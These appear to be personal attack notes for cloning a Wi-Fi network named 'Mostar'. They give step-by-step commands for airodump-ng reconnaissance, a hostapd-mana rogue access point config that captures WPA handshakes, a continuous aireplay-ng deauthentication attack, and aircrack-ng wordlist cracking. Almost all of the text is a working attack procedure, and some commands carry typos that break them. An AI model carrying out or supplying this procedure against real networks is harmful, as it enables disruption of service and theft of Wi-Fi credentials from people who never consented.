##########################################################

GATHERING INFO FOR AP TO CLONE

airmon-ng check kill
airmon-ng start wlan0
airodump-ng -w discovery --ooutput-format pcap wlan0mon
airmon-ng stop wlan0mon

wireshark cap.cap 
	filter :  wlan.fc.type == 0x08 && wlan.ssid == “Mostar”
	IEEE 802.11 Wireless Management -> Tagged Parameters -> Tag Vendor Specific ( For Enc Type )  (IF RSN INFORMATION PRESENT THEN IT ALSO SUPPORTS WPA2 )
	-> Multi Cast Cipher Suite (TKIP)
	-> Unicast Cipher Suite ( TKIP & CCMP)
	-> Auth Key Managment System
	->ESSID & BSSID
	-> Used PSK and Runs on Channel 
	-> Group Cipher Suite -> Pairwise Cipher Suite List 
	
##############################################################################################################

USING HOSTAPD MANA TO MAKE FAKE AP USING WIRELESS ADAPTER


BUILDING MANA CONF FILE

• cat Mostar-mana.conf

interface=wlan0
ssid=Mostar
channel=1
hw_mode=g / a
ieee80211n=1(for 2.4ghz)     (ieee8011b by default) 
wpa=3 (2,1)
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
mana_wpaout=/home/kali/mostar.hccapx

sudo  hostapd-mana  /etc/hostapd-mana/Mostar-mana.conf
(wait for network)

start another deauth attack using another card

aireplay-ng -0 0 -a <ap MAC> wlan1mon

ls -al | grep mostar

OR

aircrack-ng mostar.hcappx -e Mostar -w /usr/share/john/pass.lst

##############################################################################################################